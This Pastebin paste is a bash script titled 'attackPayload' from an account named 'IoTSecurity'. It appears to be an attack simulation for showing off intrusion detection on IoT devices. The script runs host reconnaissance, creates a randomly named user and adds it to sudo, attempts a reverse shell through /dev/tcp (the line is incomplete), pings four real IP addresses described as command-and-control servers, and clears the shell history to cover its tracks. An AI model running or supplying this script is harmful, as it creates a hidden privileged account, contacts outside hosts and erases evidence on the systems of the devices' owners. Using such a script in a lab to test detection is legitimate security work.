API tools faq
paste
Advertisement
IoTSecurity

attackPayload

IoTSecurity
Oct 23rd, 2019
417
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.26 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. # Running from within the attacked device
  3.  
  4. # arguments
  5. INTERACTIVE=true
  6.  
  7. function interactiveCheckpoint {
  8. if [ "$INTERACTIVE" = true ]
  9. then
  10. echo "Press [Enter] to continue attack"
  11. read continue
  12. fi
  13. }
  14.  
  15.  
  16. function attack {
  17.  
  18. # Local host reconnaissance detected
  19. echo "###################################################################"
  20. echo " Getting device information "
  21. echo "###################################################################"
  22. echo $(date -u) " Conducting analysis of host data..."
  23. uname -a -v -n
  24. echo $(date -u) " Got host data"
  25.  
  26. # Detected suspicious use of the useradd command
  27. echo "###################################################################"
  28. echo " Create User and Escalate Privilege "
  29. echo "###################################################################"
  30.  
  31. USER="privilegeduser"${RANDOM}""
  32.  
  33. echo $(date -u) " Adding user named ${USER} with privilege root to the system..."
  34. useradd $USER
  35. sudo usermod -aG sudo $USER
  36. echo $(date -u) " Successfully added user named "${USER}" with privilege root to the system"
  37.  
  38. echo -e "\e[01;32m$(toilet -f pagga "C&C Connected")\e[00m"
  39. interactiveCheckpoint
  40.  
  41. # Reverse shells, Suspicious IP address communication
  42. echo "###################################################################"
  43. echo " Communicating with CnC for getting attack commands "
  44. echo "###################################################################"
  45.  
  46. echo $(date -u) " Opening reverse shell..."
  47. bash /dev/tcp/ 2> /dev/null
  48. echo $(date -u) " Reverse shell established"
  49.  
  50. echo $(date -u) " Communicating with CnC server..."
  51. ping -c1 209.17.96.18 > pingtoCnC.txt
  52. ping -c1 209.17.96.106 > pingtoCnC.txt
  53. ping -c1 209.17.96.234 > pingtoCnC.txt
  54. ping -c1 106.51.80.198 > pingtoCnC.txt
  55.  
  56. echo $(date -u) " Listening to CnC for future attack commands..."
  57.  
  58. # Removal of system logs files detected
  59. echo "###################################################################"
  60. echo " Covering Tracks - Deleting Logs and Executables "
  61. echo "###################################################################"
  62.  
  63. echo $(date -u) " Deleting history files..."
  64. history -c
  65. echo $(date -u) " Deleted history files"
  66. }
  67.  
  68. POSITIONAL=()
  69. while [[ $# -gt 0 ]]
  70. do
  71. key="$1"
  72. case $key in
  73. -ni|--non-interactive)
  74. INTERACTIVE=false
  75. shift
  76. shift
  77. ;;
  78. -h|--help)
  79. usage
  80. exit 0
  81. ;;
  82. *)
  83. # unknown option
  84. # save it in an array for later
  85. POSITIONAL+=("$1")
  86. shift
  87. ;;
  88. esac
  89. done
  90. set -- "${POSITIONAL[@]}" # restore positional parameters
  91.  
  92. attack
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!